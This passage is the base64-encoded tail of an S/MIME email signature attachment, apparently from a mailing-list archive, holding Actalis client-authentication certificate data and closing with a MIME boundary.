LnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu
YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1H
MS9nZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8E
BAMCBaAwDQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUb
neGYazzxvjBPI0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ22
9anlEBvLZv5uEQSzZ6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW
7Ig33y+xYXr8W4lQ3haAShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i
8+8kYsT8ug+t2uSqboWrutgr/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0
by5aiDvNToIkdX4wggZHMIIEL6ADAgECAggs1IrTsR4PiTANBgkqhkiG9w0BAQsFADBrMQsw
CQYDVQQGEwJJVDEOMAwGA1UEBwwFTWlsYW4xIzAhBgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAz
MzU4NTIwOTY3MScwJQYDVQQDDB5BY3RhbGlzIEF1dGhlbnRpY2F0aW9uIFJvb3QgQ0EwHhcN
MTUwNTE0MDcxNDE1WhcNMzAwNTE0MDcxNDE1WjCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgM
Bk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1
ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA/MGJVtmI4vQEZb/NCTWrKCkw/gzK
9yerHBHuhj1d5PVsRLYMVzOVl96Iio0tqduTKpPHJ1dn6TGhL3TvWpaxnrNL6nFKpcuz5FO+
d0RpbHmF0dlwo1YbOHLkWI7gZm8aUUicUSJpj504SmONa9J5em9wOmdjDoz0Be4ejgmGMLc/
84r//lAVefO1NriJTrpGku145OAK2JELBk0rHwQV6qp9Oli98Rvgf3UTuf5jrWObR3YTx8nb
AZNpJLCNzydMjYCle6OhzO6RvaQerBoY/erlS551ZydFlzrldSEr9norfYq+tC40/fYX/kzG
S8QOcmlSee32IwTG8TOffXMNAgMBAAGjggHVMIIB0TBBBggrBgEFBQcBAQQ1MDMwMQYIKwYB
BQUHMAGGJWh0dHA6Ly9vY3NwMDUuYWN0YWxpcy5pdC9WQS9BVVRILVJPT1QwHQYDVR0OBBYE
FH5g/Phspz09166ToXkCj7N0KTv1MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiI
OsifeGbtifN7OHCUyQICNtAwRQYDVR0gBD4wPDA6BgRVHSAAMDIwMAYIKwYBBQUHAgEWJGh0
dHBzOi8vd3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDCB4wYDVR0fBIHbMIHYMIGWoIGT
oIGQhoGNbGRhcDovL2xkYXAwNS5hY3RhbGlzLml0L2NuJTNkQWN0YWxpcyUyMEF1dGhlbnRp
Y2F0aW9uJTIwUm9vdCUyMENBLG8lM2RBY3RhbGlzJTIwUy5wLkEuJTJmMDMzNTg1MjA5Njcs
YyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7YmluYXJ5MD2gO6A5hjdodHRwOi8v
Y3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEgtUk9PVC9nZXRMYXN0Q1JMMA4GA1Ud
DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEATZPO1SS+QRtKFlhzX2WJ8tl6PliMvMvE
D+VbFmeywUukM/JJ/Myad3PcXTpLnWW3AN75uVPByl3NSXczZqUofds6vznmS71Gvq553Jr4
cZBRPQ6GoOjYrYIAT2cFx8A3GJ+N9PxfMKgLdy1/27HeiDVa4TxZNwtkqAIy41EGYm170LhS
DTDeJeo/Orwq5FGhs0qp10+OTcSIr5AD4QUIKRrXE4uH/tw8ZMkw21rX/S7mguJdo4Ad4Au3
+ep5naRn6WLMryhO/iKflq8h/d6Vregvq+vClNxrtNnFNf3R7zTl1lA3ipFU909usGVa02jM
ftJ0t4utyg3yXYRc7rX3QYAlh3KdNzYToTKstUZwMpRf3VWYJJGuoSmlntbTlNtZEuLr7A+M
DOZOrZdKYp9qOruO5MqCSTDsUUkHKLFrQ11Jmix1BvdWQuobwQ5g5qZkuof6/u5rT66WDsU6
+IVt5nthH15E7zU7wULW4uC62XIYPb4YuOBCey+d4Oxs0BZ+SivL6qoDG9XNfk9JpCnaknnY
BogfUw3WLb+B5FI/zdNEysWTC4gzMOFfEoVC+myk1zX29xOvLOO3A/jGrRY1LhhY9LhT72Zb
5TQKCeyDH18yIk1st+V/mpJvnePcAYeeMr+onM9rf3AVNctcHrjwXfDVB/1Ht5l5NEl8JBj9
8lQxggP2MIID8gIBATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0G
A1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoG
A1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W
2P8IBRUwDQYJYIZIAWUDBAIBBQCgggIvMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJ
KoZIhvcNAQkFMQ8XDTE5MTEyODE0NTcyOFowLwYJKoZIhvcNAQkEMSIEIHUgVVi6K2dKIEB0
tQPAbVjXtxS4Yclx3hZ+5dWLZu3HMGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEqMAsG
CWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw
BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgagGCSsGAQQBgjcQBDGBmjCBlzCBgjELMAkGA1UE
BhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3Rh
bGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVu
dGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwgaoGCyqGSIb3DQEJEAILMYGaoIGX
MIGCMQswCQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAh
BgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENs
aWVudCBBdXRoZW50aWNhdGlvbiBDQSBHMQIQXKpTmLFIqV4YH1bY/wgFFTANBgkqhkiG9w0B
AQEFAASCAQAHG9hr/YziBS5vLwu+YsqEyjBAmDAXvDLJ2ZVf31HYOwRwSopLkP6E8/c21bae
k9ibkGG/Co6pKyLnu3fbtzuZhRgYeLmQxtClssE/v5odKbOvd4nxSwcaZFQc+/J38IHvtXWb
OExAhUG13SecR5Ovc8YIM+3kmY9ReEqqv8q6RV9sKk3dwIpkkoSsedBeD4YPjP62BqYC92TQ
SXcN6BPiJqILJcCCkWPxAjjxdQVUylQW/3w5QGlmQRA1ovBXc93dijfAN+6QypO7PzWiCvXm
xLVM4T4AbiZlQvhGA+beTYVrhrlLW3gqOCZeFIXBjnHTYAcJAiJ9jY66UywZMsVNAAAAAAAA
--------------ms000905070707070901010503--
3 years, 6 months